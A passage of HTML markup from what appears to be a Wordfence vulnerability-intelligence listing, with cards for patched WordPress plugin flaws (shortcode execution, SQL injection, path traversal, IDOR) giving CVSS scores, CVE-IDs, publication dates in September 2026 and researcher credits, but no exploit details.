				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ninja-forms" target="_blank" rel="noopener">Ninja Forms – The Contact Form Builder That Grows With You</a> <span class="wfvr-software-slug">[ninja-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hanh-nguyen" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8f890e7196b947d2121d63088d39a2fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8f890e7196b947d2121d63088d39a2fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hanh-nguyen" target="_blank" rel="noopener">DungNhi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d95427d0-77c6-41d6-93f1-508999e14242" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/95f2af83-2667-49e1-8890-99559cd90ec4" target="_blank" rel="noopener">Beaver Builder Page Builder &lt;= 2.10.3.1 &#8211; Unauthenticated Arbitrary Shortcode Execution</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18021" target="_blank" rel="noopener noreferrer">							CVE-2026-18021						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/beaver-builder-lite-version" target="_blank" rel="noopener">Beaver Builder Page Builder – Drag and Drop Website Builder</a> <span class="wfvr-software-slug">[beaver-builder-lite-version]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kishan-vyas" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d2651b24e5b91bdd5426668fea66f365.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2651b24e5b91bdd5426668fea66f365"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kishan-vyas" target="_blank" rel="noopener">Kishan Vyas</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/95f2af83-2667-49e1-8890-99559cd90ec4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d9b4448-2b63-4704-ac9e-c4db4784638c" target="_blank" rel="noopener">Email Subscribers &amp; Newsletters &lt;= 5.9.27 &#8211; Unauthenticated Arbitrary Shortcode Execution via Subscriber Name Field</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12757" target="_blank" rel="noopener noreferrer">							CVE-2026-12757						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/email-subscribers" target="_blank" rel="noopener">Email Subscribers &amp; Newsletters – Email Marketing, Post Notifications &amp; Newsletter Plugin for WordPress</a> <span class="wfvr-software-slug">[email-subscribers]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sander-horsman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8c6c59977c13c76649d0344274b8644c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8c6c59977c13c76649d0344274b8644c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sander-horsman" target="_blank" rel="noopener">Sander Horsman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d9b4448-2b63-4704-ac9e-c4db4784638c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/72ad7420-5793-496e-8607-2b346c7a3ce5" target="_blank" rel="noopener">GamiPress &lt;= 7.9.7 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15439" target="_blank" rel="noopener noreferrer">							CVE-2026-15439						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gamipress" target="_blank" rel="noopener">GamiPress – Gamification plugin to reward points, badges &amp; ranks in WordPress, now with AI</a> <span class="wfvr-software-slug">[gamipress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nox-axter" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4efd64e53b1a31312046abedbc413318.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4efd64e53b1a31312046abedbc413318"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nox-axter" target="_blank" rel="noopener">Nox Axter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/72ad7420-5793-496e-8607-2b346c7a3ce5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5916ad5d-1b8d-4cd6-af4a-620405f832a0" target="_blank" rel="noopener">Groundhogg — CRM, Newsletters, and Marketing Automation &lt;= 4.7.1 &#8211; Authenticated (Import_contacts+) Path Traversal</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85310" target="_blank" rel="noopener noreferrer">							CVE-2026-85310						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/groundhogg" target="_blank" rel="noopener">Groundhogg — CRM, Newsletters, and Marketing Automation</a> <span class="wfvr-software-slug">[groundhogg]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sergei-pro" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4f452700087bd7ca7afef13544009622.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f452700087bd7ca7afef13544009622"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sergei-pro" target="_blank" rel="noopener">Sergei Pro</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5916ad5d-1b8d-4cd6-af4a-620405f832a0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d2baa77d-caac-4c62-bbd0-8621dc66773e" target="_blank" rel="noopener">Hustle – Email Marketing, Lead Generation, Optins, Popups &lt; 7.8.14.2 &#8211; Unauthenticated Arbitrary Shortcode Execution</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-80440" target="_blank" rel="noopener noreferrer">							CVE-2026-80440						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wordpress-popup" target="_blank" rel="noopener">Hustle – Email Marketing, Lead Generation, Optins, Popups</a> <span class="wfvr-software-slug">[wordpress-popup]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d2baa77d-caac-4c62-bbd0-8621dc66773e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/229e7ca9-ed6b-4191-9fd2-c1db86230988" target="_blank" rel="noopener">LukasApps CAPTCHA tools for Contact Form 7 0.1.7 &#8211; 0.1.8 &#8211; Unauthenticated Arbitrary Shortcode Execution</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85117" target="_blank" rel="noopener noreferrer">							CVE-2026-85117						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-form-7-simple-recaptcha" target="_blank" rel="noopener">LukasApps CAPTCHA tools for Contact Form 7</a> <span class="wfvr-software-slug">[contact-form-7-simple-recaptcha]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/229e7ca9-ed6b-4191-9fd2-c1db86230988" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/677004db-d8ac-410c-89d9-ee841d643ef7" target="_blank" rel="noopener">MPG &lt;= 4.2.1 &#8211; Unauthenticated SQL Injection via URL Path</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85198" target="_blank" rel="noopener noreferrer">							CVE-2026-85198						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/multiple-pages-generator-by-porthas" target="_blank" rel="noopener">MPG – Multiple Page Generator, Bulk Landing Pages &amp; Programmatic SEO</a> <span class="wfvr-software-slug">[multiple-pages-generator-by-porthas]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nhien-pham-nhienit" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dd648f7d75a7e7a46d7d82c57b085613.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd648f7d75a7e7a46d7d82c57b085613"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nhien-pham-nhienit" target="_blank" rel="noopener">Nhien Pham (nhienit) (nhienit)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d2de85470fb8bc914ee4f18ea34d49db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2de85470fb8bc914ee4f18ea34d49db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener">thevietronin</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/677004db-d8ac-410c-89d9-ee841d643ef7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4125005c-01be-4158-8e00-d9bfd5ed6414" target="_blank" rel="noopener">Simple CAPTCHA with Cloudflare Turnstile &lt;= 1.42.1 &#8211; Unauthenticated Arbitrary Shortcode Execution</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85116" target="_blank" rel="noopener noreferrer">							CVE-2026-85116						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-cloudflare-turnstile" target="_blank" rel="noopener">Simple CAPTCHA with Cloudflare Turnstile</a> <span class="wfvr-software-slug">[simple-cloudflare-turnstile]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4125005c-01be-4158-8e00-d9bfd5ed6414" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f14e3f20-b022-49f8-89b0-acca9b950cb8" target="_blank" rel="noopener">Smart Marketing SMS and Newsletters Forms &lt;= 5.1.24 &#8211; Authenticated (Subscriber+) SQL Injection via Parameter Name</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77161" target="_blank" rel="noopener noreferrer">							CVE-2026-77161						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-marketing-for-wp" target="_blank" rel="noopener">Smart Marketing SMS and Newsletters Forms</a> <span class="wfvr-software-slug">[smart-marketing-for-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f14e3f20-b022-49f8-89b0-acca9b950cb8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f1cd9abb-c60a-43b5-baf4-8caed0791c3d" target="_blank" rel="noopener">Spam protection, Honeypot, Anti-Spam by CleanTalk &lt; 6.87 &#8211; Unauthenticated Arbitrary Shortcode Execution</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19855" target="_blank" rel="noopener noreferrer">							CVE-2026-19855						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect" target="_blank" rel="noopener">Spam protection, Honeypot, Anti-Spam by CleanTalk</a> <span class="wfvr-software-slug">[cleantalk-spam-protect]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f1cd9abb-c60a-43b5-baf4-8caed0791c3d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3e7c1a-a9c0-4e92-868c-5785d891cf8f" target="_blank" rel="noopener">Woo PDF Invoice Builder &lt;= 2.0.8 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference to Sensitive Order Information Disclosure</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11496" target="_blank" rel="noopener noreferrer">							CVE-2026-11496						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-pdf-invoice-builder" target="_blank" rel="noopener">PDF Builder for WooCommerce. Create invoices,packing slips and more</a> <span class="wfvr-software-slug">[woo-pdf-invoice-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jaskaranjeet-singh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3e1f272565d9a00d35ec564d999687a0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3e1f272565d9a00d35ec564d999687a0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jaskaranjeet-singh" target="_blank" rel="noopener">Jaskaranjeet Singh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3e7c1a-a9c0-4e92-868c-5785d891cf8f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8e7e7d78-de2f-4bdf-b04a-373463bd4d9c" target="_blank" rel="noopener">WPML Multilingual CMS &lt;= 4.9.5 &#8211;  Incorrect Authorization to Authenticated (Subscriber+) SQL Injection via ‘elementIds’</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17509" target="_blank" rel="noopener noreferrer">							CVE-2026-17509						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sitepress-multilingual-cms" target="_blank" rel="noopener">WPML Multilingual CMS</a> <span class="wfvr-software-slug">[sitepress-multilingual-cms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8e7e7d78-de2f-4bdf-b04a-373463bd4d9c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/12fd3157-6dfc-478f-81eb-49db1fb66b7f" target="_blank" rel="noopener">WPMR Google Feed Manager for WooCommerce &lt;= 2.23.7 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;feed&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19778" target="_blank" rel="noopener noreferrer">							CVE-2026-19778						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-product-feed-manager" target="_blank" rel="noopener">WPMR Google Feed Manager for WooCommerce – Sell on Google Merchant Center &amp; Shopping</a> <span class="wfvr-software-slug">[wp-product-feed-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/12fd3157-6dfc-478f-81eb-49db1fb66b7f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
